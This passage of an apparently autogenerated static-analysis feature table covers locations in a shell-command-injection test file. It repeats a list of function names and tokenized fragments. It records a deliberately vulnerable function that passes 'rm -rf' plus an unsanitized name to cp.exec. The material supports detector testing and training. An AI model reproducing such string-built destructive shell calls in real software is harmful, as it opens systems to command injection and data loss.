wha(nam ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:2:132:2 | wha(nam ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:2:132:2 | wha(nam ... T OK\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:2:132:2 | wha(nam ... T OK\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:2:132:2 | wha(nam ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:2:132:2 | wha(nam ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:130:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:130:4 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:130:4 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:130:4 | cp | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:130:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:130:4 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:130:4 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:130:4 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:130:4 | this | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:130:4 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | 'arguments' object of method wha of class Cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | 'arguments' object of method wha of class Cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | 'arguments' object of method wha of class Cla4 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | 'arguments' object of method wha of class Cla4 | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | 'arguments' object of method wha of class Cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | (name) ... T OK\\n\\t} | assignedToPropName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | (name) ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | (name) ... T OK\\n\\t} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | (name) ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | exceptional return of method wha of class Cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | exceptional return of method wha of class Cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | exceptional return of method wha of class Cla4 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | exceptional return of method wha of class Cla4 | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | exceptional return of method wha of class Cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | return of method wha of class Cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | return of method wha of class Cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | return of method wha of class Cla4 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | return of method wha of class Cla4 | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:5:132:2 | return of method wha of class Cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:6:130:9 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:6:130:9 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:6:130:9 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:6:130:9 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:6:130:9 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:6:130:9 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:6:130:9 | name | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:6:130:9 | name | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:6:130:9 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:130:6:130:9 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:4 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:4 | cp | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:9 | cp.exec | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:27 | cp.exec ... + name) | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:6:131:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:6:131:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:6:131:9 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:6:131:9 | exec | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:6:131:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| 